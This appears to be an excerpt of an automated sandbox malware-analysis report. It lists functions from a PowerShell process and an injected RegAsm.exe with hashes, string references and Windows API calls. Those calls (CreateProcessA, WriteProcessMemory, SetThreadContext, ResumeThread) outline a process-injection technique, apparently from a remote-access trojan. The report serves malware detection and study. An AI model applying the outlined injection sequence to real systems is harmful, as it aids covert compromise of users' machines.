Instruction Fuzzy Hash: 3B9112347002019BDB296A74846077B77E2ABC5351F2480BBD945FB3E1DE79CD82C7A6

Uniqueness

Uniqueness Score: -1.00%

Function 00401855 Relevance: 3.9, Strings: 3, Instructions: 178
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

@=8, xrefs: 004018DB
@=8, xrefs: 004019BA
@=8, xrefs: 0040195B

Memory Dump Source

Source File: 00000008.00000002.391093597.0000000000400000.00000040.00000800.00020000.00000000.sdmp, Offset: 00400000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_powershell.jbxd

Similarity

API ID:
String ID: @=8$@=8$@=8
API String ID: 0-3096016937
Opcode ID: 22c7ab406ceed05ca15c0d56a96a10dc7ce1beab3508fe773d7879d3d72723ef
Instruction ID: d60eb2d099f0b821d967679aae7c73e1373d57efd37e18ef0d16aec2fb76056a
Opcode Fuzzy Hash: 22c7ab406ceed05ca15c0d56a96a10dc7ce1beab3508fe773d7879d3d72723ef
Instruction Fuzzy Hash: B551C535B41200DFDB159FA58460B7BB7E2AF88310B24C0BBD555AB3E1CA79CD42CB55

Uniqueness

Uniqueness Score: -1.00%

Function 0040106F Relevance: 2.5, Strings: 2, Instructions: 44
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

D<8, xrefs: 004010B7
D<8, xrefs: 00401078

Memory Dump Source

Source File: 00000008.00000002.391093597.0000000000400000.00000040.00000800.00020000.00000000.sdmp, Offset: 00400000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_powershell.jbxd

Similarity

API ID:
String ID: D<8$D<8
API String ID: 0-3438503569
Opcode ID: 65f335b3b8fc43ec88712ca6b714e7717eb843a22833d66f59a53ad04ebb80bc
Instruction ID: 714823fc2f3a6b57d41ae33011c710ae26d326b064dd7ddd2cfd5618cb44713b
Opcode Fuzzy Hash: 65f335b3b8fc43ec88712ca6b714e7717eb843a22833d66f59a53ad04ebb80bc
Instruction Fuzzy Hash: 0801F278700204EFDF2AA6A0941063EB391AB8CB01B20C077DA157B391CA7A8D42CB5A

Uniqueness

Uniqueness Score: -1.00%

Function 00307290 Relevance: 1.8, APIs: 1, Instructions: 323
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateProcessA.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 00307557

Memory Dump Source

Source File: 00000008.00000002.391051905.0000000000300000.00000040.00000800.00020000.00000000.sdmp, Offset: 00300000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_300000_powershell.jbxd

Similarity

API ID: CreateProcess
String ID:
API String ID: 963392458-0
Opcode ID: 0d6fbce10f9f09e7bd0588becba8ca4efeef826e5c8bc1c4f7c268d81d56d109
Instruction ID: 24fed200cf5937581a06126c3b9111a29c05e48064d79c16f75945bbb0876633
Opcode Fuzzy Hash: 0d6fbce10f9f09e7bd0588becba8ca4efeef826e5c8bc1c4f7c268d81d56d109
Instruction Fuzzy Hash: DFC12570D0121DCFEB25CFA4C851BEEBBB1BB49304F0491A9D819B7280DB74AA85CF95

Uniqueness

Uniqueness Score: -1.00%

Function 00306EF8 Relevance: 1.6, APIs: 1, Instructions: 118
injectionCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

WriteProcessMemory.KERNEL32(?,?,?,?,?), ref: 00306FCB

Memory Dump Source

Source File: 00000008.00000002.391051905.0000000000300000.00000040.00000800.00020000.00000000.sdmp, Offset: 00300000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_300000_powershell.jbxd

Similarity

API ID: MemoryProcessWrite
String ID:
API String ID: 3559483778-0
Opcode ID: 80ded81d2c283be428fa5609c6bdba3a8cbb0096c6a7bbb9aa4b558681d73311
Instruction ID: 9bfceca271114c829ca319af241389e301cc9fe79b930108f00c8a0c05d02cfe
Opcode Fuzzy Hash: 80ded81d2c283be428fa5609c6bdba3a8cbb0096c6a7bbb9aa4b558681d73311
Instruction Fuzzy Hash: D541A9B4D012499FCF00CFA9D984AEEFBF1BB49314F20942AE814B7250D335AA45CF64

Uniqueness

Uniqueness Score: -1.00%

Function 00306C99 Relevance: 1.6, APIs: 1, Instructions: 100
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Wow64SetThreadContext.KERNEL32(?,?), ref: 00306D4F

Memory Dump Source

Source File: 00000008.00000002.391051905.0000000000300000.00000040.00000800.00020000.00000000.sdmp, Offset: 00300000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_300000_powershell.jbxd

Similarity

API ID: ContextThreadWow64
String ID:
API String ID: 983334009-0
Opcode ID: 5f302d39bafc0b46373f2e355a395b23dedad169c62137ef7b2656809617c192
Instruction ID: e496bd6e7002037eff4968333bde6c6f9514964dbca430bb429ea485029464e4
Opcode Fuzzy Hash: 5f302d39bafc0b46373f2e355a395b23dedad169c62137ef7b2656809617c192
Instruction Fuzzy Hash: F641DDB4D01258DFDB10CFA9D984AEEFBB0BF89314F24842AE418B7250D778AA45CF54

Uniqueness

Uniqueness Score: -1.00%

Function 00306CA0 Relevance: 1.6, APIs: 1, Instructions: 96
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Wow64SetThreadContext.KERNEL32(?,?), ref: 00306D4F

Memory Dump Source

Source File: 00000008.00000002.391051905.0000000000300000.00000040.00000800.00020000.00000000.sdmp, Offset: 00300000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_300000_powershell.jbxd

Similarity

API ID: ContextThreadWow64
String ID:
API String ID: 983334009-0
Opcode ID: a81c639149c43237b4cad9a444d09066e4638b6ca79ccf6c038744d5ae7541ce
Instruction ID: 4061f5ac46c84d426dff559cb624ce43b2e6508eb85a8db33089e70e10d23c8d
Opcode Fuzzy Hash: a81c639149c43237b4cad9a444d09066e4638b6ca79ccf6c038744d5ae7541ce
Instruction Fuzzy Hash: 9B41ABB4D01258DFDB10CFA9D984AEEFBB1BF89314F24802AE418B7250D779AA45CF54

Uniqueness

Uniqueness Score: -1.00%

Function 00306BB0 Relevance: 1.6, APIs: 1, Instructions: 75
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

ResumeThread.KERNEL32(?), ref: 00306C2E

Memory Dump Source

Source File: 00000008.00000002.391051905.0000000000300000.00000040.00000800.00020000.00000000.sdmp, Offset: 00300000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_300000_powershell.jbxd

Similarity

API ID: ResumeThread
String ID:
API String ID: 947044025-0
Opcode ID: 79f9d17b91a325b997dc0b5a1c80cec016f32d2abd435f9bc92a8ad28bd5a3d6
Instruction ID: aa47720bac0b38864b7c544ba6489e95f8f1517899c69427ec7e86830d1a6f7f
Opcode Fuzzy Hash: 79f9d17b91a325b997dc0b5a1c80cec016f32d2abd435f9bc92a8ad28bd5a3d6
Instruction Fuzzy Hash: 8131D8B4D01218DFDB10CFA9D984AEEFBB4EF89314F20842AE815B7250C735A901CF94

Uniqueness

Uniqueness Score: -1.00%

Function 004022A0 Relevance: .5, Instructions: 548COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.391093597.0000000000400000.00000040.00000800.00020000.00000000.sdmp, Offset: 00400000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 04915292103d1bacbdff44779de4416d7c319238831dcbba38fa17cfd0cf9c16
Instruction ID: a9929fe1172c7a54b973c0be4e5de9a3c5dd6aec353fec2c6f2b37df7c4a2810
Opcode Fuzzy Hash: 04915292103d1bacbdff44779de4416d7c319238831dcbba38fa17cfd0cf9c16
Instruction Fuzzy Hash: 1012F334B00204DFDB159F64C65866BBBA1AF85310F2480BBD859AB3E1DBBCCD42C766

Uniqueness

Uniqueness Score: -1.00%

Function 0040264C Relevance: .1, Instructions: 78
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000008.00000002.391093597.0000000000400000.00000040.00000800.00020000.00000000.sdmp, Offset: 00400000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3f88d1186e4fac33fcad719db81fe78226dc732bb9344497b57f780bf2dc78df
Instruction ID: f724bc414439221664c58cb5f1448f0d41bea660b4f7e10b6a2b43fff1948405
Opcode Fuzzy Hash: 3f88d1186e4fac33fcad719db81fe78226dc732bb9344497b57f780bf2dc78df
Instruction Fuzzy Hash: D9217C34A01205EFCB24DE29C658A6A77E5BF94310F188077D804AB3D1DBBDDC82CB96

Uniqueness

Uniqueness Score: -1.00%

Function 001CD006 Relevance: .0, Instructions: 47COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.391010630.00000000001CD000.00000040.00000800.00020000.00000000.sdmp, Offset: 001CD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1cd000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ac637292719ab6b7cfb20133ab04d763fe80e0dfd2d0cf1bc3630bb2ef7ce90d
Instruction ID: e3e272fd8ef55fff2d3f9c23bba5b5621033973f1b6b9991f37bbf96f3cd2f10
Opcode Fuzzy Hash: ac637292719ab6b7cfb20133ab04d763fe80e0dfd2d0cf1bc3630bb2ef7ce90d
Instruction Fuzzy Hash: 0E015E7140D3C09FE7128B259C94B52BFA4EF53624F1985DBE8848F1A3C3699C45CBB2

Uniqueness

Uniqueness Score: -1.00%

Function 001CD01D Relevance: .0, Instructions: 45COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.391010630.00000000001CD000.00000040.00000800.00020000.00000000.sdmp, Offset: 001CD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1cd000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f68a5f5efe5d795040e9d7af776a97893f01889c217a39c740c815ad91a94e90
Instruction ID: ab77858dfe4a31e831c41c94b54e0f99c00ea50a6a9642f6d4b305861a91a164
Opcode Fuzzy Hash: f68a5f5efe5d795040e9d7af776a97893f01889c217a39c740c815ad91a94e90
Instruction Fuzzy Hash: 29018471504340EAE7148A19EC84B67BB98DFA1764F18C52EFC494B182C379D945C6B1

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 004000A0 Relevance: 16.7, Strings: 13, Instructions: 407COMMON

Download Yara Rule

Strings

L4#p, xrefs: 00400160
L:8, xrefs: 00400490
L4#p, xrefs: 0040040E
(:8, xrefs: 00400240
'0, xrefs: 00400563
L4#p, xrefs: 00400419
L:8, xrefs: 004003D9
L4#p, xrefs: 004003B0
L4#p, xrefs: 004001BE
(:8, xrefs: 00400189
L:8, xrefs: 0040036B
L4#p, xrefs: 004001C9
(:8, xrefs: 0040011B

Memory Dump Source

Source File: 00000008.00000002.391093597.0000000000400000.00000040.00000800.00020000.00000000.sdmp, Offset: 00400000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_powershell.jbxd

Similarity

API ID:
String ID: '0$(:8$(:8$(:8$L4#p$L4#p$L4#p$L4#p$L4#p$L4#p$L:8$L:8$L:8
API String ID: 0-2471606776
Opcode ID: 835f6f8e17eac40b53e9019fb1b8123f6707022e7a103476f5bba73b6d305887
Instruction ID: 1b592e1c307182d85880a9a8f6cc1667c97f681315615f03589109e9e570e5be
Opcode Fuzzy Hash: 835f6f8e17eac40b53e9019fb1b8123f6707022e7a103476f5bba73b6d305887
Instruction Fuzzy Hash: 50D11135700244EFDB169B64C854BBF77A2AF84310F14807AE915AB3D2CB79DD81CBA6

Uniqueness

Uniqueness Score: -1.00%

Function 004007C0 Relevance: 5.2, Strings: 4, Instructions: 210COMMON

Download Yara Rule

Strings

$;8, xrefs: 00400A18
L4#p, xrefs: 00400880
L4#p, xrefs: 004008DE
L4#p, xrefs: 004008E9

Memory Dump Source

Source File: 00000008.00000002.391093597.0000000000400000.00000040.00000800.00020000.00000000.sdmp, Offset: 00400000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_powershell.jbxd

Similarity

API ID:
String ID: $;8$L4#p$L4#p$L4#p
API String ID: 0-2727551367
Opcode ID: 98e019abb2c585e74098f2651d3ff12be7660ea37fa391844b24ebd4bbc7d758
Instruction ID: 3b1937111f622cd4f9b9dd7608a351fa10ba1ed04eb206814ce4b072f206c6d1
Opcode Fuzzy Hash: 98e019abb2c585e74098f2651d3ff12be7660ea37fa391844b24ebd4bbc7d758
Instruction Fuzzy Hash: 5561E575704204EFEB15AB64C4507AF7BA2AF84310F14847BE905AB3D2CB78DD81C7A6

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: RegAsm.exePID: 3212, Parent PID: 2824COMMON

Execution Graph

Execution Coverage:	3.5%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	4.1%
Total number of Nodes:	1292
Total number of Limit Nodes:	39

Executed Functions

Function 0041CB50 Relevance: 148.9, APIs: 52, Strings: 33, Instructions: 176
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadLibraryA.KERNEL32(Psapi), ref: 0041CB65
GetProcAddress.KERNEL32(00000000,?,?,?,?,0040E9E1), ref: 0041CB6E
GetModuleHandleA.KERNEL32(Kernel32,GetProcessImageFileNameW,?,?,?,?,0040E9E1), ref: 0041CB85
GetProcAddress.KERNEL32(00000000,?,?,?,?,0040E9E1), ref: 0041CB88
LoadLibraryA.KERNEL32(shcore), ref: 0041CB9A
GetProcAddress.KERNEL32(00000000,?,?,?,?,0040E9E1), ref: 0041CB9D
LoadLibraryA.KERNEL32(user32), ref: 0041CBAE
GetProcAddress.KERNEL32(00000000,?,?,?,?,0040E9E1), ref: 0041CBB1
LoadLibraryA.KERNEL32(ntdll), ref: 0041CBC3
GetProcAddress.KERNEL32(00000000,?,?,?,?,0040E9E1), ref: 0041CBC6
LoadLibraryA.KERNEL32(kernel32), ref: 0041CBD2
GetProcAddress.KERNEL32(00000000,?,?,?,?,0040E9E1), ref: 0041CBD5
GetModuleHandleA.KERNEL32(kernel32,IsWow64Process,?,?,?,?,0040E9E1), ref: 0041CBE6
GetProcAddress.KERNEL32(00000000,?,?,?,?,0040E9E1), ref: 0041CBE9
GetModuleHandleA.KERNEL32(kernel32,GetComputerNameExW,?,?,?,?,0040E9E1), ref: 0041CBFA
GetProcAddress.KERNEL32(00000000,?,?,?,?,0040E9E1), ref: 0041CBFD
LoadLibraryA.KERNEL32(Shell32), ref: 0041CC0E
GetProcAddress.KERNEL32(00000000,?,?,?,?,0040E9E1), ref: 0041CC11
GetModuleHandleA.KERNEL32(kernel32,SetProcessDEPPolicy,?,?,?,?,0040E9E1), ref: 0041CC22
GetProcAddress.KERNEL32(00000000,?,?,?,?,0040E9E1), ref: 0041CC25
GetModuleHandleA.KERNEL32(user32,EnumDisplayDevicesW,?,?,?,?,0040E9E1), ref: 0041CC36
GetProcAddress.KERNEL32(00000000,?,?,?,?,0040E9E1), ref: 0041CC39
GetModuleHandleA.KERNEL32(user32,EnumDisplayMonitors,?,?,?,?,0040E9E1), ref: 0041CC4A
GetProcAddress.KERNEL32(00000000,?,?,?,?,0040E9E1), ref: 0041CC4D
GetModuleHandleA.KERNEL32(user32,GetMonitorInfoW,?,?,?,?,0040E9E1), ref: 0041CC5E
GetProcAddress.KERNEL32(00000000,?,?,?,?,0040E9E1), ref: 0041CC61
GetModuleHandleA.KERNEL32(kernel32,GetSystemTimes,?,?,?,?,0040E9E1), ref: 0041CC72
GetProcAddress.KERNEL32(00000000,?,?,?,?,0040E9E1), ref: 0041CC75
LoadLibraryA.KERNEL32(Shlwapi), ref: 0041CC83
GetProcAddress.KERNEL32(00000000,?,?,?,?,0040E9E1), ref: 0041CC86
LoadLibraryA.KERNEL32(kernel32), ref: 0041CC97
GetProcAddress.KERNEL32(00000000,?,?,?,?,0040E9E1), ref: 0041CC9A
GetModuleHandleA.KERNEL32(ntdll,NtSuspendProcess,?,?,?,?,0040E9E1), ref: 0041CCA7
GetProcAddress.KERNEL32(00000000,?,?,?,?,0040E9E1), ref: 0041CCAA
GetModuleHandleA.KERNEL32(ntdll,NtResumeProcess,?,?,?,?,0040E9E1), ref: 0041CCB7
GetProcAddress.KERNEL32(00000000,?,?,?,?,0040E9E1), ref: 0041CCBA
LoadLibraryA.KERNEL32(Iphlpapi), ref: 0041CCCC
GetProcAddress.KERNEL32(00000000,?,?,?,?,0040E9E1), ref: 0041CCCF
LoadLibraryA.KERNEL32(Iphlpapi), ref: 0041CCDC
GetProcAddress.KERNEL32(00000000,?,?,?,?,0040E9E1), ref: 0041CCDF
GetModuleHandleA.KERNEL32(ntdll,NtQueryInformationProcess,?,?,?,?,0040E9E1), ref: 0041CCF0
GetProcAddress.KERNEL32(00000000,?,?,?,?,0040E9E1), ref: 0041CCF3
GetModuleHandleA.KERNEL32(kernel32,GetFinalPathNameByHandleW,?,?,?,?,0040E9E1), ref: 0041CD04
GetProcAddress.KERNEL32(00000000,?,?,?,?,0040E9E1), ref: 0041CD07
LoadLibraryA.KERNEL32(Rstrtmgr), ref: 0041CD19
GetProcAddress.KERNEL32(00000000,?,?,?,?,0040E9E1), ref: 0041CD1C
LoadLibraryA.KERNEL32(Rstrtmgr), ref: 0041CD29
GetProcAddress.KERNEL32(00000000,?,?,?,?,0040E9E1), ref: 0041CD2C
LoadLibraryA.KERNEL32(Rstrtmgr), ref: 0041CD39
GetProcAddress.KERNEL32(00000000,?,?,?,?,0040E9E1), ref: 0041CD3C
LoadLibraryA.KERNEL32(Rstrtmgr), ref: 0041CD49
GetProcAddress.KERNEL32(00000000,?,?,?,?,0040E9E1), ref: 0041CD4C

Strings

kernel32, xrefs: 0041CBCD, 0041CBDC, 0041CBF0, 0041CC18, 0041CC68, 0041CC8D, 0041CCFA
Iphlpapi, xrefs: 0041CCC1, 0041CCCB, 0041CCD6
GetSystemTimes, xrefs: 0041CC63
RmStartSession, xrefs: 0041CD09
RmRegisterResources, xrefs: 0041CD1E
GetExtendedUdpTable, xrefs: 0041CCD1
Rstrtmgr, xrefs: 0041CD0E, 0041CD18, 0041CD23, 0041CD33, 0041CD43
GetConsoleWindow, xrefs: 0041CC88
GetProcessImageFileNameW, xrefs: 0041CB5A, 0041CB5F, 0041CB7F
GetExtendedTcpTable, xrefs: 0041CCBC
IsUserAnAdmin, xrefs: 0041CBFF
user32, xrefs: 0041CBA9, 0041CC2C, 0041CC40, 0041CC54
RmGetList, xrefs: 0041CD2E
NtUnmapViewOfSection, xrefs: 0041CBB8
SetProcessDpiAwareness, xrefs: 0041CB8F, 0041CB94, 0041CBA8
SetProcessDEPPolicy, xrefs: 0041CC13
NtResumeProcess, xrefs: 0041CCAC
shcore, xrefs: 0041CB95
RmEndSession, xrefs: 0041CD3E
EnumDisplayMonitors, xrefs: 0041CC3B
GlobalMemoryStatusEx, xrefs: 0041CBC8
GetComputerNameExW, xrefs: 0041CBEB
Shlwapi, xrefs: 0041CC79
Shell32, xrefs: 0041CC04
GetMonitorInfoW, xrefs: 0041CC4F
ntdll, xrefs: 0041CBBD, 0041CBC2, 0041CCA1, 0041CCB1, 0041CCE6
NtSuspendProcess, xrefs: 0041CC9C
NtQueryInformationProcess, xrefs: 0041CCE1
Psapi, xrefs: 0041CB60
EnumDisplayDevicesW, xrefs: 0041CC27
Kernel32, xrefs: 0041CB80
GetFinalPathNameByHandleW, xrefs: 0041CCF5
IsWow64Process, xrefs: 0041CBD7

Memory Dump Source

Source File: 0000000B.00000002.871935224.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: AddressProc$LibraryLoad$HandleModule
String ID: EnumDisplayDevicesW$EnumDisplayMonitors$GetComputerNameExW$GetConsoleWindow$GetExtendedTcpTable$GetExtendedUdpTable$GetFinalPathNameByHandleW$GetMonitorInfoW$GetProcessImageFileNameW$GetSystemTimes$GlobalMemoryStatusEx$Iphlpapi$IsUserAnAdmin$IsWow64Process$Kernel32$NtQueryInformationProcess$NtResumeProcess$NtSuspendProcess$NtUnmapViewOfSection$Psapi$RmEndSession$RmGetList$RmRegisterResources$RmStartSession$Rstrtmgr$SetProcessDEPPolicy$SetProcessDpiAwareness$Shell32$Shlwapi$kernel32$ntdll$shcore$user32
API String ID: 4236061018-3687161714
Opcode ID: d30ec231acb52cdcc59a2b6b3fe3a558d95728f00a5c8bab653e1e11384c1c5d
Instruction ID: 43d5c3d51f8f0173c8b3474e0c84bdc355f07b7b5b23ff39ae26555794408ecb
Opcode Fuzzy Hash: d30ec231acb52cdcc59a2b6b3fe3a558d95728f00a5c8bab653e1e11384c1c5d
Instruction Fuzzy Hash: 31419EA0EC035879DA107BB66DCDE3B3E5CD9857953214837B15CA7150EBBCD8408EAE

Uniqueness

Uniqueness Score: -1.00%

Function 0040F7A7 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 88
sleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00413549: RegOpenKeyExA.KERNEL32(80000001,00000000,00000000,00020019,?), ref: 00413569
Part of subcall function 00413549: RegQueryValueExA.KERNEL32 ref: 00413587
Part of subcall function 00413549: RegCloseKey.KERNEL32(?), ref: 00413592

Sleep.KERNEL32(00000BB8), ref: 0040F85B
ExitProcess.KERNEL32 ref: 0040F8CA

Strings

override, xrefs: 0040F7CC
4.9.4 Pro, xrefs: 0040F836, 0040F8A3
pth_unenc, xrefs: 0040F7BD, 0040F804, 0040F871

Memory Dump Source

Source File: 0000000B.00000002.871935224.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: CloseExitOpenProcessQuerySleepValue
String ID: 4.9.4 Pro$override$pth_unenc
API String ID: 2281282204-930821335
Opcode ID: 0c6c273467781de05ac3cf7c04fce85a932ac025a43e79accc6add002e08d8ca
Instruction ID: 07d0e0dc4205ecb16ec703249a4fc897915f305b32a2beb09604d1d6565ffe0f
Opcode Fuzzy Hash: 0c6c273467781de05ac3cf7c04fce85a932ac025a43e79accc6add002e08d8ca
Instruction Fuzzy Hash: F821F371B0420167C604767A485B6AE35A95B80718F90403FF505676D7FF7C8E0583EF

Uniqueness

Uniqueness Score: -1.00%

Function 00448957 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 30timeCOMMON

Download Yara Rule

APIs

GetSystemTimeAsFileTime.KERNEL32(00000000,0043AAB7), ref: 00448996

Strings

GetSystemTimePreciseAsFileTime, xrefs: 00448972

Memory Dump Source

Source File: 0000000B.00000002.871935224.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: Time$FileSystem
String ID: GetSystemTimePreciseAsFileTime
API String ID: 2086374402-595813830
Opcode ID: ec0f4eb119bfc3d52cbbcb4ffab675a518ff64a6f359a61470016f4626938150
Instruction ID: 0ece642104574987c61f359f6ab52f67772cb5eafdc88f944851b8b866d171c2
Opcode Fuzzy Hash: ec0f4eb119bfc3d52cbbcb4ffab675a518ff64a6f359a61470016f4626938150
Instruction Fuzzy Hash: 55E0E571A41718E7D710AB259C02E7EBB54DB44B02B10027EFC0957382DE285D0496DE

Uniqueness

Uniqueness Score: -1.00%

Function 0041B60D Relevance: 1.5, APIs: 1, Instructions: 41COMMON

Download Yara Rule

APIs

GetUserNameW.ADVAPI32(?,0040F223), ref: 0041B642

Memory Dump Source

Source File: 0000000B.00000002.871935224.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: NameUser
String ID:
API String ID: 2645101109-0
Opcode ID: 9c10d94fd0e958066dbb06410c8ca978aa41ccff27f968e031cf55491574d835
Instruction ID: 2f1a7eaa0fafc1393a04fa3680ad11d69711b7caddb5f837a5711c727b94ccef
Opcode Fuzzy Hash: 9c10d94fd0e958066dbb06410c8ca978aa41ccff27f968e031cf55491574d835
Instruction Fuzzy Hash: 3B014F7190011CABCB01EBD5DC45EEDB7BCAF44309F10016AB505B61A1EFB46E88CBA8

Uniqueness

Uniqueness Score: -1.00%

Function 00434B47 Relevance: 1.5, APIs: 1, Instructions: 3COMMON

Download Yara Rule

APIs

SetUnhandledExceptionFilter.KERNEL32 ref: 00434B4C

Memory Dump Source

Source File: 0000000B.00000002.871935224.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: ExceptionFilterUnhandled
String ID:
API String ID: 3192549508-0
Opcode ID: 94f820becb3d11eb86a2e9fe35426058ee7de7bf36e1f11b305b7456ad7b3320
Instruction ID: b2b6851a15331e9206a2225a79f218ff0d060d1473a4ca8ef9e7ab7021fb00da
Opcode Fuzzy Hash: 94f820becb3d11eb86a2e9fe35426058ee7de7bf36e1f11b305b7456ad7b3320
Instruction Fuzzy Hash:

Uniqueness

Uniqueness Score: -1.00%

Function 0040E9C5 Relevance: 86.5, APIs: 15, Strings: 34, Instructions: 795
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 0041CB50: LoadLibraryA.KERNEL32(Psapi), ref: 0041CB65
Part of subcall function 0041CB50: GetProcAddress.KERNEL32(00000000,?,?,?,?,0040E9E1), ref: 0041CB6E
Part of subcall function 0041CB50: GetModuleHandleA.KERNEL32(Kernel32,GetProcessImageFileNameW,?,?,?,?,0040E9E1), ref: 0041CB85
Part of subcall function 0041CB50: GetProcAddress.KERNEL32(00000000,?,?,?,?,0040E9E1), ref: 0041CB88
Part of subcall function 0041CB50: LoadLibraryA.KERNEL32(shcore), ref: 0041CB9A
Part of subcall function 0041CB50: GetProcAddress.KERNEL32(00000000,?,?,?,?,0040E9E1), ref: 0041CB9D
Part of subcall function 0041CB50: LoadLibraryA.KERNEL32(user32), ref: 0041CBAE
Part of subcall function 0041CB50: GetProcAddress.KERNEL32(00000000,?,?,?,?,0040E9E1), ref: 0041CBB1
Part of subcall function 0041CB50: LoadLibraryA.KERNEL32(ntdll), ref: 0041CBC3
Part of subcall function 0041CB50: GetProcAddress.KERNEL32(00000000,?,?,?,?,0040E9E1), ref: 0041CBC6
Part of subcall function 0041CB50: LoadLibraryA.KERNEL32(kernel32), ref: 0041CBD2
Part of subcall function 0041CB50: GetProcAddress.KERNEL32(00000000,?,?,?,?,0040E9E1), ref: 0041CBD5
Part of subcall function 0041CB50: GetModuleHandleA.KERNEL32(kernel32,IsWow64Process,?,?,?,?,0040E9E1), ref: 0041CBE6
Part of subcall function 0041CB50: GetProcAddress.KERNEL32(00000000,?,?,?,?,0040E9E1), ref: 0041CBE9
Part of subcall function 0041CB50: GetModuleHandleA.KERNEL32(kernel32,GetComputerNameExW,?,?,?,?,0040E9E1), ref: 0041CBFA
Part of subcall function 0041CB50: GetProcAddress.KERNEL32(00000000,?,?,?,?,0040E9E1), ref: 0041CBFD
Part of subcall function 0041CB50: LoadLibraryA.KERNEL32(Shell32), ref: 0041CC0E
Part of subcall function 0041CB50: GetProcAddress.KERNEL32(00000000,?,?,?,?,0040E9E1), ref: 0041CC11
Part of subcall function 0041CB50: GetModuleHandleA.KERNEL32(kernel32,SetProcessDEPPolicy,?,?,?,?,0040E9E1), ref: 0041CC22
Part of subcall function 0041CB50: GetProcAddress.KERNEL32(00000000,?,?,?,?,0040E9E1), ref: 0041CC25
Part of subcall function 0041CB50: GetModuleHandleA.KERNEL32(user32,EnumDisplayDevicesW,?,?,?,?,0040E9E1), ref: 0041CC36
Part of subcall function 0041CB50: GetProcAddress.KERNEL32(00000000,?,?,?,?,0040E9E1), ref: 0041CC39
Part of subcall function 0041CB50: GetModuleHandleA.KERNEL32(user32,EnumDisplayMonitors,?,?,?,?,0040E9E1), ref: 0041CC4A
Part of subcall function 0041CB50: GetProcAddress.KERNEL32(00000000,?,?,?,?,0040E9E1), ref: 0041CC4D
Part of subcall function 0041CB50: GetModuleHandleA.KERNEL32(user32,GetMonitorInfoW,?,?,?,?,0040E9E1), ref: 0041CC5E
Part of subcall function 0041CB50: GetProcAddress.KERNEL32(00000000,?,?,?,?,0040E9E1), ref: 0041CC61
Part of subcall function 0041CB50: GetModuleHandleA.KERNEL32(kernel32,GetSystemTimes,?,?,?,?,0040E9E1), ref: 0041CC72
Part of subcall function 0041CB50: GetProcAddress.KERNEL32(00000000,?,?,?,?,0040E9E1), ref: 0041CC75
Part of subcall function 0041CB50: LoadLibraryA.KERNEL32(Shlwapi), ref: 0041CC83

GetModuleFileNameW.KERNEL32(00000000,C:\Windows\Microsoft.Net\Framework\v4.0.30319\RegAsm.exe,00000104), ref: 0040E9EE

Part of subcall function 00410F37: __EH_prolog.LIBCMT ref: 00410F3C

Strings

PSG, xrefs: 0040F224
licence, xrefs: 0040EF88
PG, xrefs: 0040F154
Exe, xrefs: 0040EB0F
Inj, xrefs: 0040EBD5, 0040EBEC
PG, xrefs: 0040F0D8
del, xrefs: 0040F2ED, 0040F36F
PG, xrefs: 0040EF66
